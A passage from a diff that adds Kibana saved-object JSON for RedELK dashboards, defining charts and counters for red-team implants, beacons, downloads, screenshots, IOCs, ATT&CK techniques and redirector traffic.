1642171875895, + 117 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Modules results donut", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "4", + "params": { + "customLabel": "Module type", + "field": "module.type", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "split", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "Module type", + "field": "module.last_run.status", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": true, + "truncate": 100, + "values": true + }, + "legendPosition": "bottom", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "row": true, + "type": "pie" + }, + "title": "RedELK - Modules results donut", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "2f971ac0-926b-11eb-a753-9da683898c26", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "654f76a0-9269-11eb-a753-9da683898c26", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 119 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - IOC Types tag cloud", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "IOC Types", + "field": "ioc.type", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 72, + "minFontSize": 18, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": true + }, + "title": "RedELK - IOC Types tag cloud", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 121 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Screenshots total count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Screenshots" + }, + "schema": "metric", + "type": "count" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Screenshots total count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "389dddc0-d317-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 123 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Alarmed IOC over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Alarmed IOC" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-30h", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Alarmed IOC" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Alarmed IOC" + }, + "type": "value" + } + ] + }, + "title": "RedELK - Alarmed IOC over time", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 125 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Downloads per user tag cloud", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Downloads", + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 20 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 72, + "minFontSize": 18, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": false + }, + "title": "RedELK - Downloads per user tag cloud", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 127 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "RedELK - Dashboard links external", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [], + "params": { + "fontSize": 12, + "markdown": "**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) ", + "openLinksInNewTab": true + }, + "title": "RedELK - Dashboard links external", + "type": "markdown" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "45491770-0886-11eb-a2d2-171dc8941414", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [], + "sort": [ + 1642171875895, + 128 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - TTP Techniques unique count total ", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "MITRE ATT&CK Techniques", + "field": "threat.technique.id" + }, + "schema": "metric", + "type": "cardinality" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - TTP Techniques unique count total ", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "464660c0-d360-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 130 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "RedELK - HTTP Redir filters", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [], + "params": { + "controls": [ + { + "fieldName": "redir.backend.name", + "id": "1627506187584", + "indexPatternRefName": "control_0_index_pattern", + "label": "Backend", + "options": { + "dynamicOptions": true, + "multiselect": true, + "order": "desc", + "size": 5, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "source.as.organization.name", + "id": "1627507362404", + "indexPatternRefName": "control_1_index_pattern", + "label": "ASN", + "options": { + "dynamicOptions": true, + "multiselect": true, + "order": "desc", + "size": 5, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "source.geo.country_iso_code", + "id": "1627507398459", + "indexPatternRefName": "control_2_index_pattern", + "label": "Country", + "options": { + "dynamicOptions": true, + "multiselect": true, + "order": "desc", + "size": 5, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "tags", + "id": "1627507415074", + "indexPatternRefName": "control_3_index_pattern", + "label": "Tags", + "options": { + "dynamicOptions": true, + "multiselect": true, + "order": "desc", + "size": 5, + "type": "terms" + }, + "parent": "", + "type": "list" + } + ], + "pinFilters": false, + "updateFiltersOnChange": true, + "useTimeFilter": true + }, + "title": "RedELK - HTTP Redir filters", + "type": "input_control_vis" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "56350050-efe7-11eb-8a9f-2572da287875", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "redirtraffic", + "name": "control_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "redirtraffic", + "name": "control_1_index_pattern", + "type": "index-pattern" + }, + { + "id": "redirtraffic", + "name": "control_2_index_pattern", + "type": "index-pattern" + }, + { + "id": "redirtraffic", + "name": "control_3_index_pattern", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 135 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Implants total count ", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Implants" + }, + "schema": "metric", + "type": "count" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Implants total count ", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "57626ad0-d355-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 137 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - IOC total count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "IOC" + }, + "schema": "metric", + "type": "count" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - IOC total count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 139 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Redirector traffic alarmed IP total count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Alarmed IP", + "field": "source.ip" + }, + "schema": "metric", + "type": "cardinality" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Redirector traffic alarmed IP total count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 141 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Beacons per host", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "host.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 999 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - Beacons per host", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "632081a0-d02a-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 143 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Screenshots per user tag cloud", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 72, + "minFontSize": 18, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": false + }, + "title": "RedELK - Screenshots per user tag cloud", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "659280b0-d317-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 145 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Beacons per user", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 999 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - Beacons per user", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 147 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Alarmed IOC total count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Alarmed IOC" + }, + "schema": "metric", + "type": "count" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Alarmed IOC total count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 149 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Downloads over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Downloads" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-4w", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Downloads" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "defaultYExtents": false, + "mode": "normal", + "setYExtents": false, + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Downloads" + }, + "type": "value" + } + ] + }, + "title": "RedELK - CS - Downloads over time", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "85446c80-d04b-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 151 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "implant_newimplant" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "implant_newimplant" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + } + } + }, + "title": "RedELK - Top new implants by ext IP address and scenario", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Amount of new implants" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Redirector IP", + "field": "host.ip_ext", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 20 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "Scenario", + "field": "infra.attack_scenario", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": false, + "labels": { + "last_level": false, + "show": true, + "truncate": 100, + "values": true + }, + "legendPosition": "top", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - Top new implants by ext IP address and scenario", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 154 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - TTP Cloud Tag", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "IDs" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "TTP", + "field": "threat.technique.id", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other TTPs", + "size": 100 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 72, + "minFontSize": 18, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": false + }, + "title": "RedELK - TTP Cloud Tag", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "88db1280-d024-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 156 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "c2.log.type: \"implant_newimplant\" AND (NOT tags: testsystems_V* )" + } + } + }, + "title": "RedELK - Top users with new implants", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 20 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": false, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": true, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - Top users with new implants", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 158 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Tasks per host and user", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other users", + "size": 100 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "host.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other hosts", + "size": 100 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - Tasks per host and user", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "a5554e20-d025-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 160 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + 